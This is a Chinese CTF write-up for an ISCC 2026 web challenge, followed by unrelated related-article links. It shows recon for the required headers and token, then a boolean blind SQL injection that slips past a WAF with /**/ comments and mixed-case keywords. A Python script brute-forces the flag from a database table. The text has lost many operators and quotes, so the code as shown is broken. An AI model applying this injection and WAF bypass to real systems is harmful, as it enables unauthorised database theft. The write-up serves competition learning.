当前位置: 首页 > news >正文

【2026】ISCC 社团活动统计

社团活动统计题目类型web收集信息路径/static/hint/tech_stack.txt页面重点标记了活动,管理,和数据统计即activityadminstat这里查看源代码发现ISCC{Campus_Stat_A_只有一半The target might be combined with previous clues把线索连起来得到这几个提示 提示暴力走不通观察通关这里没有直接的但也许可以从这里开始......也许这是中间的一步关键词也许这是一个终结也是新的开始。猜测这上面的是访问顺序以此我们可以猜出来是/admin/stat/activity需要我们有合规请求头user-agentreferertoken没线索了返回去看下robot.txt找到user-agent:Campus-Stat/1.0 Referer:campus-stat.example.com通过暴力猜测猜出/?page2获得token:X-Campus-Token: campus-ctf-2024-abc123条件齐全访问/admin/stat/activity发现注入点get和三个隐藏提示提示1、title该参数用做别名使用 提示2、藏在不可见元素中 提示3、Flag表存在flag表的value字段用/**/替代空格发现注入点是dim_filterflag线索waf绕过参数分析判断dim_filter是否为表达式?dim_filter11?dim_filter21?dim_filter32观察结果条件为真显示数字为10条件为假显示数字为0证实为表达式。可以盲注绕过waf实测发现空格敏感词不是过滤就是拦截 大小没限制union不可用可以用/**/替代空格实测发现 FROM UNION SELECT 等直接写会被拦截可以用大小写和注释代替空格绕过SeLeCt/**/value/**/FrOm/**/flag测试对的?dim_filtersubstr((SeLeCt/**/value/**/FrOm/**/flag),1,1)I为10测试错的?dim_filtersubstr((SeLeCt/**/value/**/FrOm/**/flag),1,1)X然后测出flag长度27flagISCC{Campus_Stat_A_7K!zYw}expimport requests import re import string ​ # 目标地址与请求头 target_url http://39.105.213.28:8000/admin/stat/activity/ head_conf { User-Agent: Campus-Stat/1.0, Referer: https://campus-stat.example.com/, X-Campus-Token: campus-ctf-2024-abc123, } ​ # 可爆破字符集 char_list string.ascii_letters string.digits !#$%^*()_-[]{}|;:,.?~ ​ # 发送注入请求并判断结果 def check_inject(payload): param {dim_filter: payload} resp requests.get(target_url, headershead_conf, paramsparam, timeout8) match_obj re.findall(rdiv classcount(.?)/div, resp.text, re.S) if match_obj: return 10 in match_obj[0] return False ​ # 第一步获取flag长度 flag_len 0 for num in range(1, 70): inject_exp flength((SeLeCt/**/value/**/FrOm/**/flag)){num} if check_inject(inject_exp): flag_len num print(f[*] 获取flag长度{flag_len}) break ​ # 第二步逐字符爆破flag final_flag for idx in range(1, flag_len 1): for c in char_list: test_sql fsubstr((SeLeCt/**/value/**/FrOm/**/flag),{idx},1){c} if check_inject(test_sql): final_flag c print(f[*] 第{idx}位{final_flag}) break ​ print(f\n[✅] 最终flag{final_flag})
http://www.zskr.cn/news/1340545.html

相关文章:

  • 2026杭州GEO优化公司权威评测:五大厂商横向对比,避坑选型必读 - qq150194
  • ElevenLabs印尼文语音API调用全链路解析(含ISO 639-1编码陷阱与Javanese语调补偿方案)
  • Unity3d之BIM
  • 2025.12.18海南封关运作后,内地老板为何扎堆来注册公司?2026年海南注册公司代理记账靠谱财税机构排行榜单 - GrowthUME
  • 2026年美容抗衰仪器价格指南:U.SUN时光梭如何实现全民抗衰普及? - GrowthUME
  • 回顾Java知识点,面试题汇总Day10(持续更新)
  • 【原理实战】OpenClaw Memory 系统:从“多记一点“到“治理层“的演进
  • 洛谷-【图论2-3】最小生成树1
  • 《CVPR2025-DEIM创新改进项目实战:从原理到部署的深度学习优化全攻略》020、从原理到部署的深度学习优化全攻略
  • 大型房地产集团战略规划数字化转型PMO项目进度管理解决方案(PPT)
  • 2026天津市北辰区家政公司权威榜单:口碑好又专业的TOP机构揭秘 - GrowthUME
  • Amphenol ICC ND9ACK2A0A线束解析与替代方案
  • Cert-Manager 安装与配置文档
  • 解锁凋亡调控密码:核心蛋白与信号通路全景解析
  • 抖音视频怎么下载?2026年六大方法全解析及全类型工具对比 - GrowthUME
  • 探灵直播2026最新官方正版免费下载 一键转存 永久更新 (看到速转存 资源随时走丢)
  • 30天学会AI工程师|Day 13:Tool Calling 不是高级玩法,它是 Agent 开始有手脚的那一步
  • 大牛直播SDK(SmartMediaKit)Windows平台RTSP/RTMP直播播放SDK集成说明(C#版)
  • 2026 年广州 GEO 优化公司权威榜单:全意图 GEO 驱动品牌羊城增长战略指南 - GEO优化
  • 太空算力产业正崛起
  • 初次在Taotoken模型广场进行模型选型与对比的流程
  • 2026视频字幕自动生成工具推荐,AI智能字幕工具一键生成精准字幕
  • 如何快速编辑虚幻引擎游戏存档?uesave-rs终极指南
  • 2026年商用多联机品牌推荐:写字楼/商场/工厂三大场景实测对比 - 奔跑123
  • 制造业安全生产无人化巡检,未来将全面普及吗?[2026实效定调:智能体企业引领工业安全新范式]
  • Spring Boot 3 集成 Redis 实现接口缓存,让你的服务性能翻倍
  • 捕获OpenFlow1.3数据包及交互流程分析
  • 华为云云容器引擎CCE 2026-Q1优化升级,全面进化您的云原生体验!
  • 短剧平台开发|独立品牌私有化部署 三端数据互通
  • Notepad2-mod开发者实战指南:5个高效技巧让你成为开源编辑器贡献者